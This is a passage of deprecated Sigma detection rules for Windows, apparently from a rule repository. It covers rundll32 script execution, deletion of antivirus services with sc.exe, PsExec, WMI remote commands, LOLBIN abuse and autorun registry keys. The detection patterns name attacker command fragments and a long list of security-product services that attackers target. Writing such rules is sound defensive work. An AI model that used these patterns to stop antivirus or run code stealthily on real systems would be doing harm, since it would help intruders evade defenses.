Need to test if GPO push doesn't trigger FP level: medium ================================================ FILE: deprecated/windows/proc_creation_win_run_from_zip.yml ================================================ title: Run from a Zip File id: 1a70042a-6622-4a2b-8958-267625349abf status: deprecated description: Payloads may be compressed, archived, or encrypted in order to avoid detection references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md#atomic-test-4---execution-from-compressed-file author: frack113 date: 2021/12/26 modified: 2023/03/05 tags: - attack.impact - attack.t1485 logsource: category: process_creation product: windows detection: selection: Image|contains: '.zip\' condition: selection falsepositives: - Unknown level: medium ================================================ FILE: deprecated/windows/proc_creation_win_rundll32_js_runhtmlapplication.yml ================================================ title: Rundll32 JS RunHTMLApplication Pattern id: 9f06447a-a33a-4cbe-a94f-a3f43184a7a3 status: deprecated description: Detects suspicious command line patterns used when rundll32 is used to run JavaScript code references: - http://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_DETECTION_BYPASS.txt - https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART2.txt author: Florian Roth (Nextron Systems) date: 2022-01-14 modified: 2024-02-23 tags: - attack.defense_evasion logsource: category: process_creation product: windows detection: selection1: CommandLine|contains|all: - 'rundll32' - 'javascript' - '..\..\mshtml,' - 'RunHTMLApplication' selection2: CommandLine|contains: ';document.write();GetObject("script' condition: 1 of selection* falsepositives: - Unlikely level: high ================================================ FILE: deprecated/windows/proc_creation_win_rundll32_script_run.yml 
================================================ title: Suspicious Rundll32 Script in CommandLine id: 73fcad2e-ff14-4c38-b11d-4172c8ac86c7 status: deprecated description: Detects suspicious process related to rundll32 based on arguments references: - https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52 - https://github.com/redcanaryco/atomic-red-team/blob/cd3690b100a495885c407282d0c94c85f48a8a2e/atomics/T1218.011/T1218.011.md author: frack113, Zaw Min Htun (ZETA) date: 2021/12/04 modified: 2024/02/23 tags: - attack.defense_evasion - attack.t1218.011 logsource: category: process_creation product: windows detection: selection1: CommandLine|contains: 'rundll32' selection2: CommandLine|contains: - 'mshtml,RunHTMLApplication' - 'mshtml,#135' selection3: CommandLine|contains: - 'javascript:' - 'vbscript:' condition: all of selection* falsepositives: - False positives depend on scripts and administrative tools used in the monitored environment level: medium ================================================ FILE: deprecated/windows/proc_creation_win_sc_delete_av_services.yml ================================================ title: Suspicious Execution of Sc to Delete AV Services id: 7fd4bb39-12d0-45ab-bb36-cebabc73dc7b status: deprecated description: Detects when attackers use "sc.exe" to delete AV services from the system in order to avoid detection references: - https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955 author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/01 modified: 2023/03/04 tags: - attack.execution - attack.defense_evasion - attack.t1562.001 logsource: category: process_creation product: windows detection: selection_img: - Image|endswith: '\sc.exe' - OriginalFileName: 'sc.exe' selection_cli: CommandLine|contains: ' delete ' selection_av_process: CommandLine|contains: # Delete Service 'AVG' - 'AvgAdminServer' - 'AVG Antivirus' - 'MBEndpointAgent' # Delete Service 'Malwarebytes' - 
'MBAMService' - 'MBCloudEA' - 'avgAdminClient' # Delete Service 'Sophos' - 'SAVService' - 'SAVAdminService' - 'Sophos AutoUpdate Service' - 'Sophos Clean Service' - 'Sophos Device Control Service' - 'Sophos File Scanner Service' - 'Sophos Health Service' - 'Sophos MCS Agent' - 'Sophos MCS Client' - 'SntpService' - 'swc_service' - 'swi_service' - 'Sophos UI' - 'swi_update' - 'Sophos Web Control Service' - 'Sophos System Protection Service' - 'Sophos Safestore Service' - 'hmpalertsvc' - 'RpcEptMapper' - 'Sophos Endpoint Defense Service' - 'SophosFIM' - 'swi_filter' # Delete Service 'FireBird' - 'FirebirdGuardianDefaultInstance' - 'FirebirdServerDefaultInstance' # Delete Service 'Webroot' - 'WRSVC' # Delete Service 'ESET' - 'ekrn' - 'ekrnEpsw' # Delete Service 'Kaspersky' - 'klim6' - 'AVP18.0.0' - 'KLIF' - 'klpd' - 'klflt' - 'klbackupdisk' - 'klbackupflt' - 'klkbdflt' - 'klmouflt' - 'klhk' - 'KSDE1.0.0' - 'kltap' # Delete Service 'Quick Heal' - 'ScSecSvc' - 'Core Mail Protection' - 'Core Scanning Server' - 'Core Scanning ServerEx' - 'Online Protection System' - 'RepairService' - 'Core Browsing Protection' - 'Quick Update Service' # Delete Service 'McAfee' - 'McAfeeFramework' - 'macmnsvc' - 'masvc' - 'mfemms' - 'mfevtp' # Delete Service 'Trend Micro' - 'TmFilter' - 'TMLWCSService' - 'tmusa' - 'TmPreFilter' - 'TMSmartRelayService' - 'TMiCRCScanService' - 'VSApiNt' - 'TmCCSF' - 'tmlisten' - 'TmProxy' - 'ntrtscan' - 'ofcservice' - 'TmPfw' - 'PccNTUpd' # Delete Service 'Panda' - 'PandaAetherAgent' - 'PSUAService' - 'NanoServiceMain' - 'EPIntegrationService' - 'EPProtectedService' - 'EPRedline' - 'EPSecurityService' - 'EPUpdateService' condition: all of selection* falsepositives: - Legitimate software deleting using the same method of deletion (Add it to a filter if you find cases as such) level: high ================================================ FILE: deprecated/windows/proc_creation_win_schtasks_user_temp.yml ================================================ title: 
Suspicious Add Scheduled Task From User AppData Temp id: 43f487f0-755f-4c2a-bce7-d6d2eec2fcf8 status: deprecated description: Detects schtasks.exe creating a task from the user AppData\Local\Temp directory references: - malware analysis https://www.joesandbox.com/analysis/514608/0/html#324415FF7D8324231381BAD48A052F85DF04 author: frack113 date: 2021/11/03 modified: 2023/03/14 tags: - attack.execution - attack.t1053.005 logsource: product: windows category: process_creation detection: schtasks: Image|endswith: '\schtasks.exe' option: CommandLine|contains|all: - '/Create ' - '\AppData\Local\Temp' filter_klite_codec: CommandLine|contains|all: - '/Create /TN "klcp_update" /XML ' - '\klcp_update_task.xml' condition: schtasks and option and not 1 of filter_* falsepositives: - Unknown level: high ================================================ FILE: deprecated/windows/proc_creation_win_service_stop.yml ================================================ title: Stop Windows Service id: eb87818d-db5d-49cc-a987-d5da331fbd90 status: deprecated description: Detects a Windows service being stopped author: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali date: 2019/10/23 modified: 2023/03/05 tags: - attack.impact - attack.t1489 logsource: category: process_creation product: windows detection: selection_sc_net_img: - OriginalFileName: - 'sc.exe' - 'net.exe' - 'net1.exe' - Image|endswith: - '\sc.exe' - '\net.exe' - '\net1.exe' selection_sc_net_cli: CommandLine|contains: ' stop ' selection_pwsh: Image|endswith: - '\powershell.exe' - '\pwsh.exe' CommandLine|contains: 'Stop-Service ' filter: CommandLine: - 'sc stop KSCWebConsoleMessageQueue' # kaspersky Security Center Web Console double space between sc and stop - 'sc stop LGHUBUpdaterService' # Logitech LGHUB Updater Service User|contains: # covers many language settings - 'AUTHORI' - 'AUTORI' condition: (all of selection_sc_net* and not filter) or selection_pwsh fields: - ComputerName - User - CommandLine falsepositives: - Administrator shutting down 
the service due to upgrade or removal purposes level: low ================================================ FILE: deprecated/windows/proc_creation_win_susp_bitstransfer.yml ================================================ title: Suspicious Bitstransfer via PowerShell id: cd5c8085-4070-4e22-908d-a5b3342deb74 status: deprecated description: Detects transferring files from system on a server bitstransfer Powershell cmdlets references: - https://docs.microsoft.com/en-us/powershell/module/bitstransfer/add-bitsfile?view=windowsserver2019-ps author: Austin Songer @austinsonger date: 2021/08/19 modified: 2023/01/10 tags: - attack.exfiltration - attack.persistence - attack.t1197 logsource: category: process_creation product: windows detection: selection: Image|endswith: - '\powershell.exe' - '\powershell_ise.exe' - '\pwsh.exe' CommandLine|contains: - 'Get-BitsTransfer' - 'Add-BitsFile' condition: selection falsepositives: - Unknown level: medium ================================================ FILE: deprecated/windows/proc_creation_win_susp_cmd_exectution_via_wmi.yml ================================================ title: Suspicious Cmd Execution via WMI id: e31f89f7-36fb-4697-8ab6-48823708353b status: deprecated description: Detects suspicious command execution (cmd) via Windows Management Instrumentation (WMI) on a remote host. This could be indicative of adversary lateral movement. 
references: - https://www.elastic.co/guide/en/security/current/suspicious-cmd-execution-via-wmi.html author: Tim Rauch date: 2022/09/27 modified: 2023/01/19 tags: - attack.execution - attack.t1047 logsource: category: process_creation product: windows detection: selection: Image|endswith: '\cmd.exe' ParentImage|endswith: '\WmiPrvSE.exe' CommandLine|contains: '\\\\127.0.0.1\\' selection_opt: CommandLine|contains: - '2>&1' - '1>' condition: all of selection* falsepositives: - Unknown level: medium ================================================ FILE: deprecated/windows/proc_creation_win_susp_commandline_chars.yml ================================================ title: Suspicious Characters in CommandLine id: 2c0d2d7b-30d6-4d14-9751-7b9113042ab9 status: deprecated description: Detects suspicious Unicode characters in the command line, which could be a sign of obfuscation or defense evasion references: - https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation author: Florian Roth (Nextron Systems) date: 2022/04/27 modified: 2023/03/03 tags: - attack.defense_evasion logsource: product: windows category: process_creation detection: selection_spacing_modifiers: CommandLine|contains: # spacing modifier letters that get auto-replaced - 'ˣ' # 0x02E3 - '˪' # 0x02EA - 'ˢ' # 0x02E2 selection_unicode_slashes: # forward slash alternatives CommandLine|contains: - '∕' # 0x22FF - '⁄' # 0x206F selection_unicode_hyphens: # hyphen alternatives CommandLine|contains: - '―' # 0x2015 - '—' # 0x2014 condition: 1 of selection* falsepositives: - Unknown level: high ================================================ FILE: deprecated/windows/proc_creation_win_susp_lolbin_non_c_drive.yml ================================================ title: Wscript Execution from Non C Drive id: 5b80cf53-3a46-4adc-960b-05ec19348d74 status: deprecated description: Detects Wscript or Cscript executing from a drive other than C. 
This has been observed with Qakbot executing from within a mounted ISO file. references: - https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_BB_30.09.2022.txt - https://app.any.run/tasks/4985c746-601e-401a-9ccf-ae350ac2e887/ author: Aaron Herman date: 2022/10/01 modified: 2023/08/29 tags: - attack.execution - attack.t1059 logsource: category: process_creation product: windows detection: selection_lolbin: Image|endswith: - '\wscript.exe' - '\cscript.exe' selection_exetensions: CommandLine|contains: - '.js' - '.vbs' - '.vbe' selection_drive_path: CommandLine|contains: ':\' filter_drive_path: CommandLine|contains: - ' C:\\' - " 'C:\\" - ' "C:\\' filter_env_vars: CommandLine|contains: '%' filter_unc_paths: CommandLine|contains: ' \\\\' condition: all of selection_* and not 1 of filter_* falsepositives: - Legitimate scripts located on other partitions such as "D:" level: medium ================================================ FILE: deprecated/windows/proc_creation_win_susp_run_folder.yml ================================================ title: Process Start From Suspicious Folder id: dca91cfd-d7ab-4c66-8da7-ee57d487b35b status: deprecated description: Detects process start from rare or uncommon folders like temporary folder or folders that usually don't contain executable files references: - Malware sandbox results author: frack113 date: 2022/02/11 modified: 2022/11/03 tags: - attack.execution - attack.t1204 logsource: category: process_creation product: windows detection: selection: Image|contains: - '\Desktop\' - '\Temp\' - '\Temporary Internet' filter_parent: - ParentImage: - 'C:\Windows\System32\cleanmgr.exe' - 'C:\Program Files (x86)\Microsoft Visual Studio\Installer\resources\app\ServiceHub\Services\Microsoft.VisualStudio.Setup.Service\BackgroundDownload.exe' - 'C:\Windows\System32\dxgiadaptercache.exe' - ParentImage|startswith: 'C:\Program Files (x86)\NVIDIA Corporation\' filter_other: Image|endswith: 'setup.exe' # the missing \ at the beginning is intended - 
to cover e.g. MySoftwareSetup.exe as well filter_edge: Image|startswith: 'C:\Program Files (x86)\Microsoft\Temp\' Image|endswith: '.tmp\MicrosoftEdgeUpdate.exe' #OriginalFileName: msedgeupdate.dll condition: selection and not 1 of filter* falsepositives: - Installers are expected to be run from the "AppData\Local\Temp" and "C:\Windows\Temp\" directories level: low ================================================ FILE: deprecated/windows/proc_creation_win_susp_squirrel_lolbin.yml ================================================ title: Squirrel Lolbin id: fa4b21c9-0057-4493-b289-2556416ae4d7 status: deprecated description: Detects Possible Squirrel Packages Manager as Lolbin references: - http://www.hexacorn.com/blog/2019/03/30/sqirrel-packages-manager-as-a-lolbin-a-k-a-many-electron-apps-are-lolbins-by-default/ - http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/ author: Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community date: 2019/11/12 modified: 2023/02/14 tags: - attack.execution - attack.defense_evasion - attack.t1218 logsource: category: process_creation product: windows detection: selection1: Image|endswith: '\update.exe' selection2: CommandLine|contains: - '--processStart' - '--processStartAndWait' - '--createShortcut' filter_discord: CommandLine|contains|all: - 'C:\Users\' - '\AppData\Local\Discord\Update.exe' - ' --processStart' - 'Discord.exe' filter_github_desktop: CommandLine|contains|all: - 'C:\Users\' - '\AppData\Local\GitHubDesktop\Update.exe' - 'GitHubDesktop.exe' CommandLine|contains: - '--createShortcut' - '--processStartAndWait' filter_teams: CommandLine|contains|all: - 'C:\Users\' - '\AppData\Local\Microsoft\Teams\Update.exe' - 'Teams.exe' CommandLine|contains: - '--processStart' - '--createShortcut' condition: all of selection* and not 1 of filter_* falsepositives: - 1Clipboard - Beaker Browser - Caret - Collectie - Discord - Figma - Flow - Ghost - GitHub Desktop - GitKraken - Hyper - Insomnia - JIBO - Kap - Kitematic - Now 
Desktop - Postman - PostmanCanary - Rambox - Simplenote - Skype - Slack - SourceTree - Stride - Svgsus - WebTorrent - WhatsApp - WordPress.com - Atom - Gitkraken - Slack - Teams level: medium ================================================ FILE: deprecated/windows/proc_creation_win_sysinternals_psexec_service_execution.yml ================================================ title: PsExec Tool Execution id: fa91cc36-24c9-41ce-b3c8-3bbc3f2f67ba related: - id: 42c575ea-e41e-41f1-b248-8093c3e82a28 type: derived status: deprecated description: Detects PsExec service execution via default service image name references: - https://www.jpcert.or.jp/english/pub/sr/ir_research.html - https://jpcertcc.github.io/ToolAnalysisResultSheet author: Thomas Patzke date: 2017/06/12 modified: 2023/02/28 tags: - attack.execution - attack.t1569.002 - attack.s0029 logsource: category: process_creation product: windows detection: selection: Image|endswith: '\PSEXESVC.exe' User|contains: # covers many language settings - 'AUTHORI' - 'AUTORI' condition: selection fields: - EventID - CommandLine - ParentCommandLine - ServiceName - ServiceFileName - TargetFilename - PipeName falsepositives: - Unknown level: low ================================================ FILE: deprecated/windows/proc_creation_win_sysinternals_psexesvc_start.yml ================================================ title: PsExec Service Start id: 3ede524d-21cc-472d-a3ce-d21b568d8db7 status: deprecated description: Detects a PsExec service start author: Florian Roth (Nextron Systems) date: 2018/03/13 modified: 2023/02/28 tags: - attack.execution - attack.s0029 - attack.t1569.002 logsource: category: process_creation product: windows detection: selection: CommandLine: C:\Windows\PSEXESVC.exe condition: selection falsepositives: - Administrative activity level: low ================================================ FILE: deprecated/windows/proc_creation_win_whoami_as_system.yml ================================================ title: 
Run Whoami as SYSTEM id: 80167ada-7a12-41ed-b8e9-aa47195c66a1 status: deprecated description: Detects whoami.exe being executed by LOCAL SYSTEM. This may be a sign of a successful local privilege escalation. references: - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment author: Teymur Kheirkhabarov, Florian Roth date: 2019/10/23 modified: 2023/02/28 tags: - attack.privilege_escalation - attack.discovery - attack.t1033 logsource: category: process_creation product: windows detection: selection_user: User|contains: # covers many language settings - 'AUTHORI' - 'AUTORI' selection_img: - OriginalFileName: 'whoami.exe' - Image|endswith: '\whoami.exe' condition: all of selection* falsepositives: - Possible name overlap with the NT AUTHORITY substring used to cover all languages level: high ================================================ FILE: deprecated/windows/proc_creation_win_whoami_execution.yml ================================================ title: Whoami Utility Execution id: e28a5a99-da44-436d-b7a0-2afc20a5f413 status: deprecated # Deprecated in favor of 502b42de-4306-40b4-9596-6f590c81f073 description: Detects the execution of whoami, which is often used by attackers after exploitation / privilege escalation references: - https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/ - https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/ author: Florian Roth (Nextron Systems) date: 2018-08-13 modified: 2025-10-20 tags: - attack.discovery - attack.t1033 - car.2016-03-001 logsource: category: process_creation product: windows detection: selection: - Image|endswith: '\whoami.exe' - OriginalFileName: 'whoami.exe' condition: selection falsepositives: - Admin activity - Scripts and administrative tools used in the monitored environment - Monitoring activity level: low ================================================ FILE: deprecated/windows/proc_creation_win_winword_dll_load.yml
================================================ title: Winword.exe Loads Suspicious DLL id: 2621b3a6-3840-4810-ac14-a02426086171 status: deprecated description: Detects Winword.exe loading a custom DLL using the /l flag author: Victor Sergeev, oscd.community references: - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Winword/ date: 2020/10/09 modified: 2022/07/25 logsource: category: process_creation product: windows detection: selection: Image|endswith: '\winword.exe' CommandLine|contains: '/l' condition: selection fields: - CommandLine falsepositives: - Unknown level: medium tags: - attack.defense_evasion - attack.t1202 ================================================ FILE: deprecated/windows/proc_creation_win_wmic_execution_via_office_process.yml ================================================ title: WMI Execution Via Office Process id: 518643ba-7d9c-4fa5-9f37-baed36059f6a related: - id: e1693bc8-7168-4eab-8718-cdcaa68a1738 type: derived - id: 438025f9-5856-4663-83f7-52f878a70a50 type: similar status: deprecated description: Initial execution of malicious document calls wmic to execute the file with regsvr32 references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml author: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule) date: 2021/08/23 modified: 2023/02/04 tags: - attack.t1204.002 - attack.t1047 - attack.t1218.010 - attack.execution - attack.defense_evasion logsource: product: windows category: process_creation detection: selection_img: - Image|endswith: '\wbem\WMIC.exe' - OriginalFileName: 'wmic.exe' selection_parent: ParentImage|endswith: - '\winword.exe' - '\excel.exe' - '\powerpnt.exe' condition: all of selection_* falsepositives: - Unknown level: medium ================================================ FILE: 
deprecated/windows/proc_creation_win_wmic_remote_command.yml ================================================ title: WMI Remote Command Execution id: e42af9df-d90b-4306-b7fb-05c863847ebd status: deprecated description: An adversary might use WMI to execute commands on a remote system references: - https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/ - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic author: frack113 date: 2022/03/13 modified: 2023/02/14 tags: - attack.execution - attack.t1047 logsource: category: process_creation product: windows detection: selection_img: - Image|endswith: '\WMIC.exe' - OriginalFileName: 'wmic.exe' selection_cli: CommandLine|contains|all: - '/node:' - 'process' - 'call' - 'create' condition: all of selection* falsepositives: - Unknown level: medium ================================================ FILE: deprecated/windows/proc_creation_win_wmic_remote_service.yml ================================================ title: WMI Reconnaissance List Remote Services id: 09af397b-c5eb-4811-b2bb-08b3de464ebf status: deprecated description: | An adversary might use WMI to check if a certain Remote Service is running on a remote device. When the test completes, service information is displayed on the screen if the service exists. A common feedback message is "No instance(s) Available" if the queried service is not running.
A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the provided remote host is unreachable references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic author: frack113 date: 2022/01/01 modified: 2023/02/14 tags: - attack.execution - attack.t1047 logsource: category: process_creation product: windows detection: selection_img: - Image|endswith: '\WMIC.exe' - OriginalFileName: 'wmic.exe' selection_cli: CommandLine|contains|all: - '/node:' - 'service' condition: all of selection* falsepositives: - Unknown level: medium ================================================ FILE: deprecated/windows/proc_creation_win_wuauclt_execution.yml ================================================ title: Windows Update Client LOLBIN id: d7825193-b70a-48a4-b992-8b5b3015cc11 status: deprecated description: Detects code execution via the Windows Update client (wuauclt) references: - https://dtm.uk/wuauclt/ author: FPT.EagleEye Team date: 2020/10/17 modified: 2023/11/11 tags: - attack.command_and_control - attack.defense_evasion - attack.t1105 - attack.t1218 logsource: product: windows category: process_creation detection: selection_img: - Image|endswith: '\wuauclt.exe' - OriginalFileName: 'wuauclt.exe' selection_cli: CommandLine|contains|all: - '/UpdateDeploymentProvider' - '/RunHandlerComServer' - '.dll' filter: CommandLine|contains: - ' /ClassId ' - ' wuaueng.dll ' condition: all of selection* and not filter falsepositives: - Unknown level: high ================================================ FILE: deprecated/windows/process_creation_syncappvpublishingserver_exe.yml ================================================ title: SyncAppvPublishingServer Execution to Bypass Powershell Restriction id: fde7929d-8beb-4a4c-b922-be9974671667 description: Detects SyncAppvPublishingServer 
process execution, which is usually utilized by adversaries to bypass PowerShell execution restrictions. references: - https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/ author: 'Ensar Şamil, @sblmsrsn, OSCD Community' date: 2020/10/05 modified: 2022/04/11 tags: - attack.defense_evasion - attack.t1218 logsource: product: windows category: process_creation detection: selection: Image|endswith: '\SyncAppvPublishingServer.exe' condition: selection falsepositives: - App-V clients level: medium status: deprecated ================================================ FILE: deprecated/windows/registry_add_sysinternals_sdelete_registry_keys.yml ================================================ title: Sysinternals SDelete Registry Keys id: 9841b233-8df8-4ad7-9133-b0b4402a9014 status: deprecated description: A general detection that triggers on the creation or modification of .*\Software\Sysinternals\SDelete registry keys. These are indicators of the use of the Sysinternals SDelete tool. references: - https://github.com/OTRF/detection-hackathon-apt29/issues/9 - https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/4.B.2_59A9AC92-124D-4C4B-A6BF-3121C98677C3.md author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) date: 2020/05/02 modified: 2023/02/07 tags: - attack.defense_evasion - attack.t1070.004 logsource: product: windows category: registry_add detection: selection: EventType: CreateKey TargetObject|contains: '\Software\Sysinternals\SDelete' condition: selection falsepositives: - Unknown level: medium ================================================ FILE: deprecated/windows/registry_event_asep_reg_keys_modification.yml ================================================ title: Autorun Keys Modification id: 17f878b8-9968-4578-b814-c4217fc5768c description: Detects modification of autostart extensibility points (ASEPs) in the registry.
status: deprecated references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md - https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys date: 2019/10/25 modified: 2022/05/14 author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton logsource: category: registry_event product: windows level: medium detection: main_selection: TargetObject|contains: - '\SOFTWARE\Wow6432Node\Microsoft\Windows CE Services\AutoStart' - '\Software\Wow6432Node\Microsoft\Command Processor\Autorun' - '\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components' - '\SOFTWARE\Microsoft\Windows CE Services\AutoStartOnDisconnect' - '\SOFTWARE\Microsoft\Windows CE Services\AutoStartOnConnect' - '\SYSTEM\Setup\CmdLine' - '\Software\Microsoft\Ctf\LangBarAddin' - '\Software\Microsoft\Command Processor\Autorun' - '\SOFTWARE\Microsoft\Active Setup\Installed Components' - '\SOFTWARE\Classes\Protocols\Handler' - '\SOFTWARE\Classes\Protocols\Filter' - '\SOFTWARE\Classes\Htmlfile\Shell\Open\Command\(Default)' - '\Environment\UserInitMprLogonScript' - '\SOFTWARE\Policies\Microsoft\Windows\Control Panel\Desktop\Scrnsave.exe' - '\Software\Microsoft\Internet Explorer\UrlSearchHooks' - '\SOFTWARE\Microsoft\Internet Explorer\Desktop\Components' - '\Software\Classes\Clsid\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\Inprocserver32' - '\Control Panel\Desktop\Scrnsave.exe' session_manager_base: TargetObject|contains: '\System\CurrentControlSet\Control\Session Manager' session_manager: TargetObject|contains: - '\SetupExecute' - '\S0InitialCommand' - '\KnownDlls' - '\Execute' - '\BootExecute' - '\AppCertDlls' current_version_base: TargetObject|contains: '\SOFTWARE\Microsoft\Windows\CurrentVersion' current_version: TargetObject|contains: - '\ShellServiceObjectDelayLoad' - 
'\Run' - '\Policies\System\Shell' - '\Policies\Explorer\Run' - '\Group Policy\Scripts\Startup' - '\Group Policy\Scripts\Shutdown' - '\Group Policy\Scripts\Logon' - '\Group Policy\Scripts\Logoff' - '\Explorer\ShellServiceObjects' - '\Explorer\ShellIconOverlayIdentifiers' - '\Explorer\ShellExecuteHooks' - '\Explorer\SharedTaskScheduler' - '\Explorer\Browser Helper Objects' - '\Authentication\PLAP Providers' - '\Authentication\Credential Providers' - '\Authentication\Credential Provider Filters' nt_current_version_base: TargetObject|contains: '\SOFTWARE\Microsoft\Windows NT\CurrentVersion' nt_current_version: TargetObject|contains: - '\Winlogon\VmApplet' - '\Winlogon\Userinit' - '\Winlogon\Taskman' - '\Winlogon\Shell' - '\Winlogon\GpExtensions' - '\Winlogon\AppSetup' - '\Winlogon\AlternateShells\AvailableShells' - '\Windows\IconServiceLib' - '\Windows\Appinit_Dlls' - '\Image File Execution Options' - '\Font Drivers' - '\Drivers32' - '\Windows\Run' - '\Windows\Load' wow_current_version_base: TargetObject|contains: '\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion' wow_current_version: TargetObject|contains: - '\ShellServiceObjectDelayLoad' - '\Run' - '\Explorer\ShellServiceObjects' - '\Explorer\ShellIconOverlayIdentifiers' - '\Explorer\ShellExecuteHooks' - '\Explorer\SharedTaskScheduler' - '\Explorer\Browser Helper Objects' wow_nt_current_version_base: TargetObject|contains: '\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion' wow_nt_current_version: TargetObject|contains: - '\Windows\Appinit_Dlls' - '\Image File Execution Options' - '\Drivers32' wow_office: TargetObject|contains: '\Software\Wow6432Node\Microsoft\Office' office: TargetObject|contains: '\Software\Microsoft\Office' wow_office_details: TargetObject|contains: - '\Word\Addins' - '\PowerPoint\Addins' - '\Outlook\Addins' - '\Onenote\Addins' - '\Excel\Addins' - '\Access\Addins' - 'test\Special\Perf' wow_ie: TargetObject|contains: '\Software\Wow6432Node\Microsoft\Internet Explorer' ie: 
TargetObject|contains: '\Software\Microsoft\Internet Explorer' wow_ie_details: TargetObject|contains: - '\Toolbar' - '\Extensions' - '\Explorer Bars' wow_classes_base: TargetObject|contains: '\Software\Wow6432Node\Classes' wow_classes: TargetObject|contains: - '\Folder\ShellEx\ExtShellFolderViews' - '\Folder\ShellEx\DragDropHandlers' - '\Folder\ShellEx\ColumnHandlers' - '\Directory\Shellex\DragDropHandlers' - '\Directory\Shellex\CopyHookHandlers' - '\CLSID\{AC757296-3522-4E11-9862-C17BE5A1767E}\Instance' - '\CLSID\{ABE3B9A4-257D-4B97-BD1A-294AF496222E}\Instance' - '\CLSID\{7ED96837-96F0-4812-B211-F13C24117ED3}\Instance' - '\CLSID\{083863F1-70DE-11d0-BD40-00A0C911CE86}\Instance' - '\AllFileSystemObjects\ShellEx\DragDropHandlers' - '\ShellEx\PropertySheetHandlers' - '\ShellEx\ContextMenuHandlers' classes_base: TargetObject|contains: '\Software\Classes' classes: TargetObject|contains: - '\Folder\ShellEx\ExtShellFolderViews' - '\Folder\ShellEx\DragDropHandlers' - '\Folder\Shellex\ColumnHandlers' - '\Filter' - '\Exefile\Shell\Open\Command\(Default)' - '\Directory\Shellex\DragDropHandlers' - '\Directory\Shellex\CopyHookHandlers' - '\CLSID\{AC757296-3522-4E11-9862-C17BE5A1767E}\Instance' - '\CLSID\{ABE3B9A4-257D-4B97-BD1A-294AF496222E}\Instance' - '\CLSID\{7ED96837-96F0-4812-B211-F13C24117ED3}\Instance' - '\CLSID\{083863F1-70DE-11d0-BD40-00A0C911CE86}\Instance' - '\Classes\AllFileSystemObjects\ShellEx\DragDropHandlers' - '\.exe' - '\.cmd' - '\ShellEx\PropertySheetHandlers' - '\ShellEx\ContextMenuHandlers' scripts_base: TargetObject|contains: '\Software\Policies\Microsoft\Windows\System\Scripts' scripts: TargetObject|contains: - '\Startup' - '\Shutdown' - '\Logon' - '\Logoff' winsock_parameters_base: TargetObject|contains: '\System\CurrentControlSet\Services\WinSock2\Parameters' winsock_parameters: TargetObject|contains: - '\Protocol_Catalog9\Catalog_Entries' - '\NameSpace_Catalog5\Catalog_Entries' system_control_base: TargetObject|contains: 
'\SYSTEM\CurrentControlSet\Control' system_control: TargetObject|contains: - '\Terminal Server\WinStations\RDP-Tcp\InitialProgram' - '\Terminal Server\Wds\rdpwd\StartupPrograms' - '\SecurityProviders\SecurityProviders' - '\SafeBoot\AlternateShell' - '\Print\Providers' - '\Print\Monitors' - '\NetworkProvider\Order' - '\Lsa\Notification Packages' - '\Lsa\Authentication Packages' - '\BootVerificationProgram\ImagePath' filter: - Details: '(Empty)' - TargetObject|endswith: '\NgcFirst\ConsecutiveSwitchCount' - Image: 'C:\WINDOWS\System32\svchost.exe' condition: ( main_selection or session_manager_base and session_manager or current_version_base and current_version or nt_current_version_base and nt_current_version or wow_current_version_base and wow_current_version or wow_nt_current_version_base and wow_nt_current_version or (wow_office or office) and wow_office_details or (wow_ie or ie) and wow_ie_details or wow_classes_base and wow_classes or classes_base and classes or scripts_base and scripts or winsock_parameters_base and winsock_parameters or system_control_base and system_control ) and not filter fields: - SecurityID - ObjectName - OldValueType - NewValueType falsepositives: - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason - Legitimate administrator sets up autorun keys for legitimate reason tags: - attack.persistence - attack.t1547.001 ================================================ FILE: deprecated/windows/registry_set_abusing_windows_telemetry_for_persistence.yml ================================================ title: Abusing Windows Telemetry For Persistence - Registry id: 